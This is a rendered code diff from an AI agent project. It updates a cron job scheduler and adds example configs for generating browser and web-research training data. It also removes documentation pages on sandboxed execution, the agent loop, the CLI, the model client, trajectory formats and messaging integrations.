prefill_messages=prefill_messages,
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
provider_sort=pr.get("sort"),
quiet_mode=True,
session_id=f"cron_{job_id}_{datetime.now().strftime('%Y%m%d_%H%M%S')}"
session_id=f"cron_{job_id}_{_hermes_now().strftime('%Y%m%d_%H%M%S')}"
)
# Run the conversation
result = agent.run_conversation(prompt)
# Extract final response
final_response = result.get("final_response", "")
if not final_response:
final_response = "(No response generated)"
# Build output document
output = f"""# Cron Job: {job_name}
**Job ID:** {job_id}
**Run Time:** {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
@@ -69,18 +278,17 @@ def run_job(job: dict) -> tuple[bool, str, Optional[str]]:
{final_response}
"""
print(f"[cron] Job '{job_name}' completed successfully")
return True, output, None
logger.info("Job '%s' completed successfully", job_name)
return True, output, final_response, None
except Exception as e:
error_msg = f"{type(e).__name__}: {str(e)}"
print(f"[cron] Job '{job_name}' failed: {error_msg}")
logger.error("Job '%s' failed: %s", job_name, error_msg)
# Build error output
output = f"""# Cron Job: {job_name} (FAILED)
**Job ID:** {job_id}
**Run Time:** {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
**Run Time:** {_hermes_now().strftime('%Y-%m-%d %H:%M:%S')}
**Schedule:** {job.get('schedule_display', 'N/A')}
## Prompt
@@ -95,94 +303,88 @@ def run_job(job: dict) -> tuple[bool, str, Optional[str]]:
{traceback.format_exc()}
```
"""
return False, output, error_msg
return False, output, "", error_msg
finally:
# Clean up injected env vars so they don't leak to other jobs
for key in ("HERMES_SESSION_PLATFORM", "HERMES_SESSION_CHAT_ID", "HERMES_SESSION_CHAT_NAME"):
os.environ.pop(key, None)
def tick(verbose: bool = True) -> int:
"""
Check and run all due jobs.
This is designed to be called by system cron every minute:
*/1 * * * * cd ~/hermes-agent && python -c "from cron import tick; tick()"
Uses a file lock so only one tick runs at a time, even if the gateway's
in-process ticker and a standalone daemon or manual tick overlap.
Args:
verbose: Whether to print status messages
Returns:
Number of jobs executed
Number of jobs executed (0 if another tick is already running)
"""
due_jobs = get_due_jobs()
if verbose and not due_jobs:
print(f"[cron] {datetime.now().strftime('%H:%M:%S')} - No jobs due")
return 0
if verbose:
print(f"[cron] {datetime.now().strftime('%H:%M:%S')} - {len(due_jobs)} job(s) due")
executed = 0
for job in due_jobs:
try:
success, output, error = run_job(job)
# Save output to file
output_file = save_job_output(job["id"], output)
if verbose:
print(f"[cron] Output saved to: {output_file}")
# Mark job as run (handles repeat counting, next_run computation)
mark_job_run(job["id"], success, error)
executed += 1
except Exception as e:
print(f"[cron] Error processing job {job['id']}: {e}")
mark_job_run(job["id"], False, str(e))
return executed
_LOCK_DIR.mkdir(parents=True, exist_ok=True)
def run_daemon(check_interval: int = 60, verbose: bool = True):
"""
Run the cron daemon continuously.
Checks for due jobs every `check_interval` seconds.
Args:
check_interval: Seconds between checks (default: 60)
verbose: Whether to print status messages
"""
print(f"[cron] Starting daemon (checking every {check_interval}s)")
print(f"[cron] Press Ctrl+C to stop")
print()
# Cross-platform file locking: fcntl on Unix, msvcrt on Windows
lock_fd = None
try:
while True:
lock_fd = open(_LOCK_FILE, "w")
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
elif msvcrt:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_NBLCK, 1)
except (OSError, IOError):
logger.debug("Tick skipped — another instance holds the lock")
if lock_fd is not None:
lock_fd.close()
return 0
try:
due_jobs = get_due_jobs()
if verbose and not due_jobs:
logger.info("%s - No jobs due", _hermes_now().strftime('%H:%M:%S'))
return 0
if verbose:
logger.info("%s - %s job(s) due", _hermes_now().strftime('%H:%M:%S'), len(due_jobs))
executed = 0
for job in due_jobs:
try:
tick(verbose=verbose)
success, output, final_response, error = run_job(job)
output_file = save_job_output(job["id"], output)
if verbose:
logger.info("Output saved to: %s", output_file)
# Deliver the final response to the origin/target chat
deliver_content = final_response if success else f"⚠️ Cron job '{job.get('name', job['id'])}' failed:\n{error}"
if deliver_content:
try:
_deliver_result(job, deliver_content)
except Exception as de:
logger.error("Delivery failed for job %s: %s", job["id"], de)
mark_job_run(job["id"], success, error)
executed += 1
except Exception as e:
print(f"[cron] Tick error: {e}")
time.sleep(check_interval)
except KeyboardInterrupt:
print("\n[cron] Daemon stopped")
logger.error("Error processing job %s: %s", job['id'], e)
mark_job_run(job["id"], False, str(e))
return executed
finally:
if fcntl:
fcntl.flock(lock_fd, fcntl.LOCK_UN)
elif msvcrt:
try:
msvcrt.locking(lock_fd.fileno(), msvcrt.LK_UNLCK, 1)
except (OSError, IOError):
pass
lock_fd.close()
if __name__ == "__main__":
# Allow running directly: python cron/scheduler.py [daemon|tick]
import argparse
parser = argparse.ArgumentParser(description="Hermes Cron Scheduler")
parser.add_argument("mode", choices=["daemon", "tick"], default="tick", nargs="?",
help="Mode: 'tick' to run once, 'daemon' to run continuously")
parser.add_argument("--interval", type=int, default=60,
help="Check interval in seconds for daemon mode")
parser.add_argument("--quiet", "-q", action="store_true",
help="Suppress status messages")
args = parser.parse_args()
if args.mode == "daemon":
run_daemon(check_interval=args.interval, verbose=not args.quiet)
else:
tick(verbose=not args.quiet)
tick(verbose=True)

View File

@@ -0,0 +1,5 @@
{"prompt": "Go to https://news.ycombinator.com and find the top 5 posts on the front page. For each post, get the title, URL, points, and number of comments. Return the results as a formatted summary."}
{"prompt": "Navigate to https://en.wikipedia.org/wiki/Hermes and extract the first paragraph of the article, the image caption, and the list of items in the infobox. Summarize what you find."}
{"prompt": "Go to https://github.com/trending and find the top 3 trending repositories today. For each repo, get the name, description, language, and star count. Write the results to a file called trending_repos.md."}
{"prompt": "Visit https://httpbin.org/forms/post and fill out the form with sample data (customer name: Jane Doe, size: Medium, topping: Bacon, delivery time: 12:00). Submit the form and report what the response page shows."}
{"prompt": "Navigate to https://books.toscrape.com, browse to the Travel category, find the highest-rated book, and extract its title, price, availability, and description."}

View File

@@ -0,0 +1,65 @@
#!/bin/bash
# =============================================================================
# Example: Browser-Focused Data Generation
# =============================================================================
#
# Generates tool-calling trajectories for browser automation tasks.
# The agent navigates websites, fills forms, extracts information, etc.
#
# Distribution: browser 97%, web 20%, vision 12%, terminal 15%
#
# Prerequisites:
# - OPENROUTER_API_KEY in ~/.hermes/.env
# - BROWSERBASE_API_KEY in ~/.hermes/.env (for browser tools)
# - A dataset JSONL file with one {"prompt": "..."} per line
#
# Usage:
# cd ~/.hermes/hermes-agent
# bash datagen-config-examples/run_browser_tasks.sh
#
# Output: data/browser_tasks_example/trajectories.jsonl
# =============================================================================
mkdir -p logs
LOG_FILE="logs/browser_tasks_$(date +%Y%m%d_%H%M%S).log"
echo "📝 Logging to: $LOG_FILE"
# Point to the example dataset in this directory
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
python batch_runner.py \
--dataset_file="$SCRIPT_DIR/example_browser_tasks.jsonl" \
--batch_size=5 \
--run_name="browser_tasks_example" \
--distribution="browser_tasks" \
--model="anthropic/claude-sonnet-4" \
--base_url="https://openrouter.ai/api/v1" \
--num_workers=3 \
--max_turns=30 \
--ephemeral_system_prompt="You are an AI assistant with browser automation capabilities. Your primary task is to navigate and interact with web pages to accomplish user goals.
IMPORTANT GUIDELINES:
1. SEARCHING: Do NOT search directly on Google via the browser — they block automated searches. Use the web_search tool first to find URLs, then navigate to them with browser tools.
2. COOKIE/PRIVACY DIALOGS: After navigating to a page, check for cookie consent or privacy popups. Dismiss them by clicking Accept/Close/OK before interacting with other elements. Take a fresh browser_snapshot afterward.
3. HANDLING TIMEOUTS: If an action times out, the element may be blocked by an overlay. Take a new snapshot and look for dialogs to dismiss. If none, try an alternative approach or report the issue.
4. GENERAL: Use browser tools to click, fill forms, and extract information. Use terminal for local file operations. Verify your actions and handle errors gracefully." \
2>&1 | tee "$LOG_FILE"
echo "✅ Done. Log: $LOG_FILE"
# =============================================================================
# Common options you can add:
#
# --resume Resume from checkpoint if interrupted
# --verbose Enable detailed logging
# --max_tokens=63000 Set max response tokens
# --reasoning_disabled Disable model thinking/reasoning tokens
# --providers_allowed="anthropic,google" Restrict to specific providers
# --prefill_messages_file="configs/prefill.json" Few-shot priming
# =============================================================================

View File

@@ -0,0 +1,46 @@
# datagen-config-examples/web_research.yaml
#
# Batch data generation config for WebResearchEnv.
# Generates tool-calling trajectories for multi-step web research tasks.
#
# Usage:
# python batch_runner.py \
# --config datagen-config-examples/web_research.yaml \
# --run_name web_research_v1
environment: web-research
# Toolsets available to the agent during data generation
toolsets:
- web
- file
# How many parallel workers to use
num_workers: 4
# Questions per batch
batch_size: 20
# Total trajectories to generate (comment out to run full dataset)
max_items: 500
# Model to use for generation (override with --model flag)
model: openrouter/nousresearch/hermes-3-llama-3.1-405b
# System prompt additions (ephemeral — not saved to trajectories)
ephemeral_system_prompt: |
You are a highly capable research agent. When asked a factual question,
always use web_search to find current, accurate information before answering.
Cite at least 2 sources. Be concise and accurate.
# Output directory
output_dir: data/web_research_v1
# Trajectory compression settings (for fitting into training token budgets)
compression:
enabled: true
target_max_tokens: 16000
# Eval settings
eval_every: 100 # Run eval every N trajectories
eval_size: 25 # Number of held-out questions per eval run

View File

@@ -1,224 +0,0 @@
# Modal Backend
Hermes Agent uses [Modal](https://modal.com) for scalable, isolated cloud execution environments. There are two Modal integrations:
1. **Terminal Tool** (`tools/terminal_tool.py`) - For CLI/agent command execution
2. **Atropos Backend** (`atropos/backends/modal_backend.py`) - For batch RL training workloads
---
## Terminal Tool (CLI/Agent)
The terminal tool provides a simple interface for executing commands in Modal sandboxes.
### Configuration
Set environment variables:
```bash
export TERMINAL_ENV=modal
export TERMINAL_MODAL_IMAGE=python:3.11
export TERMINAL_MODAL_APP_NAME=hermes-sandbox
```
Or use a YAML config file (`modal_profiles.yaml`):
```yaml
profiles:
default:
image: python:3.11
cpu: 1.0
memory: 2048
min_pool: 1
max_pool: 5
idle_timeout: 120
gpu:
image: pytorch/pytorch:2.1.0-cuda12.1-cudnn8-runtime
gpu: T4
memory: 16384
min_pool: 0
max_pool: 2
```
### Features
| Feature | Description |
|---------|-------------|
| **Sandbox Pool** | Pre-warmed sandboxes for low latency |
| **Auto-scaling** | Grows/shrinks pool based on demand |
| **Idle Timeout** | Sandboxes auto-terminate when unused |
| **Profile Selection** | Different configs for different workloads |
| **Credential Injection** | `modal.Secret` integration |
### Usage
```python
from tools.terminal_tool import terminal_tool
# Simple command
output = terminal_tool("echo hello", task_id="my-task")
# With profile selection
output = terminal_tool("python train.py", task_id="training", profile="gpu")
# Cleanup when done
from tools.terminal_tool import cleanup_vm
cleanup_vm("my-task")
```
### Architecture
```
_ModalPoolManager (singleton)
├── "default" pool → [sandbox-0, sandbox-1, ...]
└── "gpu" pool → [sandbox-0, ...]
Each pool:
- Maintains min_pool warm sandboxes
- Scales up to max_pool on demand
- Background thread scales down idle sandboxes
```
---
## Atropos Backend (RL Training)
The Atropos backend is designed for high-throughput batch execution during reinforcement learning training.
### Key Concept: Slot-based Multiplexing
Instead of one sandbox per trajectory, multiple trajectories share sandboxes via **slots**:
```
Sandbox (1 container)
├── Slot 0 → Trajectory A (workspace: /data/slot_0)
├── Slot 1 → Trajectory B (workspace: /data/slot_1)
└── Slot 2 → Trajectory C (workspace: /data/slot_2)
```
**Benefits**:
- Fewer containers = lower cost
- Shared warm-up time
- Better GPU utilization
### Configuration
```python
from atropos.backends.modal_backend import ModalSandboxConfig, ModalToolBackend
config = ModalSandboxConfig(
name="default",
image="python:3.11",
cpu=1.0,
memory=2048,
slots_per_sandbox=10, # 10 trajectories per container
min_sandboxes=1,
max_sandboxes=5,
)
backend = ModalToolBackend(config.with_app_name("my-training"))
```
### Multi-Profile Support
Different trajectory types can request different resources:
```python
backend = ModalToolBackend.with_profiles(
app_name="rl-training",
profiles={
"default": ModalSandboxConfig(
name="default",
cpu=1.0,
memory=2048,
),
"pytorch-gpu": ModalSandboxConfig(
name="pytorch-gpu",
image="pytorch/pytorch:2.1.0-cuda12.1-cudnn8-runtime",
gpu="T4",
memory=16384,
),
}
)
# CPU task
slot1 = await backend.acquire("traj-1", profile="default")
# GPU task
slot2 = await backend.acquire("traj-2", profile="pytorch-gpu")
```
### Batched Execution
The key optimization - execute many commands in parallel:
```python
# Acquire slots for multiple trajectories
slots = [await backend.acquire(f"traj-{i}") for i in range(50)]
# Execute batch across all slots in parallel
results = await backend.execute_batch([
(slot, "bash", {"command": "python step.py"})
for slot in slots
])
# Release slots
for slot in slots:
await backend.release(slot)
```
### Architecture
```
ModalToolBackend
└── _ModalMultiProfileManager
├── "default" → _ModalSandboxPool
│ ├── Sandbox 0 (slots 0-9)
│ └── Sandbox 1 (slots 0-9)
└── "pytorch-gpu" → _ModalSandboxPool
└── Sandbox 0 (slots 0-9)
```
---
## Credentials
Inject secrets securely using Modal's secret management:
```bash
# Create secret in Modal dashboard or CLI
modal secret create my-api-key API_KEY=sk-xxx
```
```python
# Reference in config
config = ModalSandboxConfig(
secrets=["my-api-key"], # Modal secret names
env_vars={"DEBUG": "1"}, # Additional env vars
)
```
## Troubleshooting
### "Modal package not installed"
```bash
pip install modal
modal token new # Authenticate
```
### "Sandbox creation failed"
- Check Modal dashboard for quota limits
- Verify image exists and is accessible
- Check secret names are correct
### Shutdown errors
These are harmless warnings during Python interpreter shutdown:
```
[Modal] Error terminating ...: cannot schedule new futures after interpreter shutdown
```
The sandboxes will auto-terminate via Modal's idle_timeout anyway.

View File

@@ -1,104 +0,0 @@
# Agents
The agent is the core loop that orchestrates LLM calls and tool execution.
## AIAgent Class
The main agent is implemented in `run_agent.py`:
```python
class AIAgent:
def __init__(
self,
model: str = "anthropic/claude-sonnet-4",
api_key: str = None,
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 20,
enabled_toolsets: list = None,
disabled_toolsets: list = None,
verbose_logging: bool = False,
):
# Initialize OpenAI client, load tools based on toolsets
...
def chat(self, user_message: str, task_id: str = None) -> str:
# Main entry point - runs the agent loop
...
```
## Agent Loop
The core loop in `_run_agent_loop()`:
```
1. Add user message to conversation
2. Call LLM with tools
3. If LLM returns tool calls:
- Execute each tool
- Add tool results to conversation
- Go to step 2
4. If LLM returns text response:
- Return response to user
```
```python
while turns < max_turns:
response = client.chat.completions.create(
model=model,
messages=messages,
tools=tool_schemas,
)
if response.tool_calls:
for tool_call in response.tool_calls:
result = await execute_tool(tool_call)
messages.append(tool_result_message(result))
turns += 1
else:
return response.content
```
## Conversation Management
Messages are stored as a list of dicts following OpenAI format:
```python
messages = [
{"role": "system", "content": "You are a helpful assistant..."},
{"role": "user", "content": "Search for Python tutorials"},
{"role": "assistant", "content": None, "tool_calls": [...]},
{"role": "tool", "tool_call_id": "...", "content": "..."},
{"role": "assistant", "content": "Here's what I found..."},
]
```
## Reasoning Context
For models that support reasoning (chain-of-thought), the agent:
1. Extracts `reasoning_content` from API responses
2. Stores it in `assistant_msg["reasoning"]` for trajectory export
3. Passes it back via `reasoning_content` field on subsequent turns
## Trajectory Export
Conversations can be exported for training:
```python
agent = AIAgent(save_trajectories=True)
agent.chat("Do something")
# Saves to trajectories/*.jsonl in ShareGPT format
```
## Batch Processing
For processing multiple prompts, use `batch_runner.py`:
```bash
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=20 \
--num_workers=4 \
--run_name=my_run
```
See `batch_runner.py` for parallel execution with checkpointing.

View File

@@ -1,296 +0,0 @@
# CLI
The Hermes Agent CLI provides an interactive terminal interface for working with the agent.
## Running the CLI
```bash
# Basic usage
./hermes
# With specific model
./hermes --model "anthropic/claude-sonnet-4"
# With specific toolsets
./hermes --toolsets "web,terminal,skills"
# Verbose mode
./hermes --verbose
```
## Architecture
The CLI is implemented in `cli.py` and uses:
- **Rich** - Welcome banner with ASCII art and styled panels
- **prompt_toolkit** - Fixed input area with command history
- **KawaiiSpinner** - Animated feedback during operations
```
┌─────────────────────────────────────────────────┐
│ HERMES-AGENT ASCII Logo │
│ ┌─────────────┐ ┌────────────────────────────┐ │
│ │ Caduceus │ │ Model: claude-opus-4.5 │ │
│ │ ASCII Art │ │ Terminal: local │ │
│ │ │ │ Working Dir: /home/user │ │
│ │ │ │ Available Tools: 19 │ │
│ │ │ │ Available Skills: 12 │ │
│ └─────────────┘ └────────────────────────────┘ │
└─────────────────────────────────────────────────┘
│ Conversation output scrolls here... │
│ │
│ User: Hello! │
│ ────────────────────────────────────────────── │
│ (◕‿◕✿) 🧠 pondering... (2.3s) │
│ ✧٩(ˊᗜˋ*)و✧ got it! (2.3s) │
│ │
│ Assistant: Hello! How can I help you today? │
├─────────────────────────────────────────────────┤
[Fixed input area at bottom] │
└─────────────────────────────────────────────────┘
```
## Commands
| Command | Description |
|---------|-------------|
| `/help` | Show available commands |
| `/tools` | List available tools grouped by toolset |
| `/toolsets` | List available toolsets with descriptions |
| `/model [name]` | Show or change the current model |
| `/prompt [text]` | View/set/clear custom system prompt |
| `/personality [name]` | Set a predefined personality |
| `/clear` | Clear screen and reset conversation |
| `/reset` | Reset conversation only (keep screen) |
| `/history` | Show conversation history |
| `/save` | Save current conversation to file |
| `/config` | Show current configuration |
| `/quit` | Exit the CLI (also: `/exit`, `/q`) |
## Configuration
The CLI is configured via `cli-config.yaml`. Copy from `cli-config.yaml.example`:
```bash
cp cli-config.yaml.example cli-config.yaml
```
### Model Configuration
```yaml
model:
default: "anthropic/claude-opus-4.5"
base_url: "https://openrouter.ai/api/v1"
```
### Terminal Configuration
The CLI supports multiple terminal backends:
```yaml
# Local execution (default)
terminal:
env_type: "local"
cwd: "." # Current directory
# SSH remote execution (sandboxed - agent can't touch its own code)
terminal:
env_type: "ssh"
cwd: "/home/myuser/project"
ssh_host: "my-server.example.com"
ssh_user: "myuser"
ssh_key: "~/.ssh/id_rsa"
# Docker container
terminal:
env_type: "docker"
docker_image: "python:3.11"
# Singularity/Apptainer (HPC)
terminal:
env_type: "singularity"
singularity_image: "docker://python:3.11"
# Modal cloud
terminal:
env_type: "modal"
modal_image: "python:3.11"
```
### Sudo Support
The CLI supports interactive sudo prompts:
```
┌──────────────────────────────────────────────────────────┐
│ 🔐 SUDO PASSWORD REQUIRED │
├──────────────────────────────────────────────────────────┤
│ Enter password below (input is hidden), or: │
│ • Press Enter to skip (command fails gracefully) │
│ • Wait 45s to auto-skip │
└──────────────────────────────────────────────────────────┘
Password (hidden):
```
**Options:**
- **Interactive**: Leave `sudo_password` unset - you'll be prompted when needed
- **Configured**: Set `sudo_password` in `cli-config.yaml` to auto-fill
- **Environment**: Set `SUDO_PASSWORD` in `.env` for all runs
Password is cached for the session once entered.
### Toolsets
Control which tools are available:
```yaml
# Enable all tools
toolsets:
- all
# Or enable specific toolsets
toolsets:
- web
- terminal
- skills
```
Available toolsets: `web`, `search`, `terminal`, `browser`, `vision`, `image_gen`, `skills`, `moa`, `debugging`, `safe`
### Personalities
Predefined personalities for the `/personality` command:
```yaml
agent:
personalities:
helpful: "You are a helpful, friendly AI assistant."
kawaii: "You are a kawaii assistant! Use cute expressions..."
pirate: "Arrr! Ye be talkin' to Captain Hermes..."
# Add your own!
```
Built-in personalities:
- `helpful`, `concise`, `technical`, `creative`, `teacher`
- `kawaii`, `catgirl`, `pirate`, `shakespeare`, `surfer`
- `noir`, `uwu`, `philosopher`, `hype`
## Animated Feedback
The CLI provides animated feedback during operations:
### Thinking Animation
During API calls, shows animated spinner with thinking verbs:
```
◜ (。•́︿•̀。) pondering... (1.2s)
◠ (⊙_⊙) contemplating... (2.4s)
✧٩(ˊᗜˋ*)و✧ got it! (3.1s)
```
### Tool Execution Animation
Each tool type has unique animations:
```
⠋ (◕‿◕✿) 🔍 web_search... (0.8s)
▅ (≧◡≦) 💻 terminal... (1.2s)
🌓 (★ω★) 🌐 browser_navigate... (2.1s)
✧ (✿◠‿◠) 🎨 image_generate... (4.5s)
```
## Multi-line Input
For multi-line input, end a line with `\` to continue:
```
Write a function that:\
1. Takes a list of numbers\
2. Returns the sum
```
## Environment Variable Priority
For terminal settings, `cli-config.yaml` takes precedence over `.env`:
1. `cli-config.yaml` (highest priority in CLI)
2. `.env` file
3. System environment variables
4. Default values
This allows you to have different terminal configs for CLI vs batch processing.
## Session Management
- **History**: Command history is saved to `~/.hermes_history`
- **Conversations**: Use `/save` to export conversations
- **Reset**: Use `/clear` for full reset, `/reset` to just clear history
- **Session Logs**: Every session automatically logs to `logs/session_{session_id}.json`
### Session Logging
Sessions are automatically logged to the `logs/` directory:
```
logs/
├── session_20260201_143052_a1b2c3.json
├── session_20260201_150217_d4e5f6.json
└── ...
```
The session ID is displayed in the welcome banner and follows the format: `YYYYMMDD_HHMMSS_UUID`.
Log files contain:
- Full conversation history in trajectory format
- Timestamps for session start and last update
- Model and message count metadata
This is useful for:
- Debugging agent behavior
- Replaying conversations
- Training data inspection
### Context Compression
Long conversations can exceed model context limits. The CLI automatically compresses context when approaching the limit:
```yaml
# In cli-config.yaml
compression:
enabled: true # Enable auto-compression
threshold: 0.85 # Compress at 85% of context limit
summary_model: "google/gemini-2.0-flash-001"
```
**How it works:**
1. Tracks actual token usage from each API response
2. When tokens reach threshold, middle turns are summarized
3. First 3 and last 4 turns are always protected
4. Conversation continues seamlessly after compression
**When compression triggers:**
```
📦 Context compression triggered (170,000 tokens ≥ 170,000 threshold)
📊 Model context limit: 200,000 tokens (85% = 170,000)
🗜️ Summarizing turns 4-15 (12 turns)
✅ Compressed: 20 → 9 messages (~45,000 tokens saved)
```
To disable compression:
```yaml
compression:
enabled: false
```
## Quiet Mode
The CLI runs in "quiet mode" (`HERMES_QUIET=1`), which:
- Suppresses verbose logging from tools
- Enables kawaii-style animated feedback
- Hides terminal environment warnings
- Keeps output clean and user-friendly
For verbose output (debugging), use:
```bash
./hermes --verbose
```

View File

@@ -1,124 +0,0 @@
# LLM Client
Hermes Agent uses the OpenAI Python SDK with OpenRouter as the backend, providing access to many models through a single API.
## Configuration
```python
from openai import OpenAI
client = OpenAI(
api_key=os.getenv("OPENROUTER_API_KEY"),
base_url="https://openrouter.ai/api/v1"
)
```
## Supported Models
Any model available on [OpenRouter](https://openrouter.ai/models):
```python
# Anthropic
model = "anthropic/claude-sonnet-4"
model = "anthropic/claude-opus-4"
# OpenAI
model = "openai/gpt-4o"
model = "openai/o1"
# Google
model = "google/gemini-2.0-flash"
# Open models
model = "meta-llama/llama-3.3-70b-instruct"
model = "deepseek/deepseek-chat-v3"
model = "moonshotai/kimi-k2.5"
```
## Tool Calling
Standard OpenAI function calling format:
```python
response = client.chat.completions.create(
model=model,
messages=messages,
tools=[
{
"type": "function",
"function": {
"name": "web_search",
"description": "Search the web",
"parameters": {
"type": "object",
"properties": {
"query": {"type": "string"}
},
"required": ["query"]
}
}
}
],
)
# Check for tool calls
if response.choices[0].message.tool_calls:
for tool_call in response.choices[0].message.tool_calls:
name = tool_call.function.name
args = json.loads(tool_call.function.arguments)
# Execute tool...
```
## Reasoning Models
Some models return reasoning/thinking content:
```python
# Access reasoning if available
message = response.choices[0].message
if hasattr(message, 'reasoning_content') and message.reasoning_content:
reasoning = message.reasoning_content
# Store for trajectory export
```
## Provider Selection
OpenRouter allows selecting specific providers:
```python
response = client.chat.completions.create(
model=model,
messages=messages,
extra_body={
"provider": {
"order": ["Anthropic", "Google"], # Preferred providers
"ignore": ["Novita"], # Providers to skip
}
}
)
```
## Error Handling
Common errors and handling:
```python
try:
response = client.chat.completions.create(...)
except openai.RateLimitError:
# Back off and retry
except openai.APIError as e:
# Check e.code for specific errors
# 400 = bad request (often provider-specific)
# 502 = bad gateway (retry with different provider)
```
## Cost Tracking
OpenRouter returns usage info:
```python
usage = response.usage
print(f"Tokens: {usage.prompt_tokens} + {usage.completion_tokens}")
print(f"Cost: ${usage.cost:.6f}") # If available
```

View File

@@ -1,121 +0,0 @@
# Message Format & Trajectories
Hermes Agent uses two message formats: the **API format** for LLM calls and the **trajectory format** for training data export.
## API Message Format
Standard OpenAI chat format used during execution:
```python
messages = [
# System prompt
{"role": "system", "content": "You are a helpful assistant with tools..."},
# User query
{"role": "user", "content": "Search for Python tutorials"},
# Assistant with tool call
{
"role": "assistant",
"content": None,
"tool_calls": [{
"id": "call_abc123",
"type": "function",
"function": {
"name": "web_search",
"arguments": "{\"query\": \"Python tutorials\"}"
}
}]
},
# Tool result
{
"role": "tool",
"tool_call_id": "call_abc123",
"content": "{\"results\": [...]}"
},
# Final response
{"role": "assistant", "content": "Here's what I found..."}
]
```
## Trajectory Format (ShareGPT)
Exported for training in ShareGPT format:
```json
{
"conversations": [
{"from": "system", "value": "You are a helpful assistant..."},
{"from": "human", "value": "Search for Python tutorials"},
{"from": "gpt", "value": "<tool_call>\n{\"name\": \"web_search\", \"arguments\": {\"query\": \"Python tutorials\"}}\n</tool_call>"},
{"from": "tool", "value": "<tool_response>\n{\"results\": [...]}\n</tool_response>"},
{"from": "gpt", "value": "Here's what I found..."}
],
"tools": "[{\"type\": \"function\", \"function\": {...}}]",
"source": "hermes-agent"
}
```
## Reasoning Content
For models that output reasoning/chain-of-thought:
**During execution** (API format):
```python
# Stored internally but not sent back to model in content
assistant_msg = {
"role": "assistant",
"content": "Here's what I found...",
"reasoning": "Let me think about this step by step..." # Internal only
}
```
**In trajectory export** (reasoning wrapped in tags):
```json
{
"from": "gpt",
"value": "<think>\nLet me think about this step by step...\n</think>\nHere's what I found..."
}
```
## Conversion Flow
```
API Response → Internal Storage → Trajectory Export
↓ ↓ ↓
tool_calls reasoning field <tool_call> tags
reasoning_content <think> tags
```
The conversion happens in `_convert_to_trajectory_format()` in `run_agent.py`.
## Ephemeral System Prompts
Batch processing supports ephemeral system prompts that guide behavior during execution but are NOT saved to trajectories:
```python
# During execution: full system prompt + ephemeral guidance
messages = [
{"role": "system", "content": SYSTEM_PROMPT + "\n\n" + ephemeral_prompt},
...
]
# In saved trajectory: only the base system prompt
trajectory = {
"conversations": [
{"from": "system", "value": SYSTEM_PROMPT}, # No ephemeral
...
]
}
```
## Trajectory Compression
Long trajectories can be compressed for training using `trajectory_compressor.py`:
- Protects first/last N turns
- Summarizes middle turns with LLM
- Targets specific token budget
- See `configs/trajectory_compression.yaml` for settings

View File

@@ -1,515 +0,0 @@
# Messaging Platform Integrations (Gateway)
Hermes Agent can connect to messaging platforms like Telegram, Discord, and WhatsApp to serve as a conversational AI assistant.
## Quick Start
```bash
# 1. Set your bot token(s) in .env file
echo 'TELEGRAM_BOT_TOKEN="your_telegram_bot_token"' >> .env
echo 'DISCORD_BOT_TOKEN="your_discord_bot_token"' >> .env
# 2. Test the gateway (foreground)
./scripts/hermes-gateway run
# 3. Install as a system service (runs in background)
./scripts/hermes-gateway install
# 4. Manage the service
./scripts/hermes-gateway start
./scripts/hermes-gateway stop
./scripts/hermes-gateway restart
./scripts/hermes-gateway status
```
**Quick test (without service install):**
```bash
python cli.py --gateway # Runs in foreground, useful for debugging
```
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────┐
│ Hermes Gateway │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ Telegram │ │ Discord │ │ WhatsApp │ │
│ │ Adapter │ │ Adapter │ │ Adapter │ │
│ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │ │
│ └─────────────────┼─────────────────┘ │
│ │ │
│ ┌────────▼────────┐ │
│ │ Session Store │ │
│ │ (per-chat) │ │
│ └────────┬────────┘ │
│ │ │
│ ┌────────▼────────┐ │
│ │ AIAgent │ │
│ │ (run_agent) │ │
│ └─────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
```
## Session Management
### Session Persistence
Sessions persist across messages until they reset. The agent remembers your conversation context.
### Reset Policies
Sessions reset based on configurable policies:
| Policy | Default | Description |
|--------|---------|-------------|
| Daily | 4:00 AM | Reset at a specific hour each day |
| Idle | 120 min | Reset after N minutes of inactivity |
| Both | (combined) | Whichever triggers first |
### Manual Reset
Send `/new` or `/reset` as a message to start fresh.
### Per-Platform Overrides
Configure different reset policies per platform:
```json
{
"reset_by_platform": {
"telegram": { "mode": "idle", "idle_minutes": 240 },
"discord": { "mode": "idle", "idle_minutes": 60 }
}
}
```
## Platform Setup
### Telegram
1. **Create a bot** via [@BotFather](https://t.me/BotFather)
2. **Get your token** (looks like `123456789:ABCdefGHIjklMNOpqrsTUVwxyz`)
3. **Set environment variable:**
```bash
export TELEGRAM_BOT_TOKEN="your_token_here"
```
4. **Optional: Set home channel** for cron job delivery:
```bash
export TELEGRAM_HOME_CHANNEL="-1001234567890"
export TELEGRAM_HOME_CHANNEL_NAME="My Notes"
```
**Requirements:**
```bash
pip install python-telegram-bot>=20.0
```
### Discord
1. **Create an application** at [Discord Developer Portal](https://discord.com/developers/applications)
2. **Create a bot** under your application
3. **Get the bot token**
4. **Enable required intents:**
- Message Content Intent
- Server Members Intent (optional)
5. **Invite to your server** using OAuth2 URL generator (scopes: `bot`, `applications.commands`)
6. **Set environment variable:**
```bash
export DISCORD_BOT_TOKEN="your_token_here"
```
7. **Optional: Set home channel:**
```bash
export DISCORD_HOME_CHANNEL="123456789012345678"
export DISCORD_HOME_CHANNEL_NAME="#bot-updates"
```
**Requirements:**
```bash
pip install discord.py>=2.0
```
### WhatsApp
WhatsApp integration is more complex due to the lack of a simple bot API.
**Options:**
1. **WhatsApp Business API** (requires Meta verification)
2. **whatsapp-web.js** via Node.js bridge (for personal accounts)
**Bridge Setup:**
1. Install Node.js
2. Set up the bridge script (see `scripts/whatsapp-bridge/` for reference)
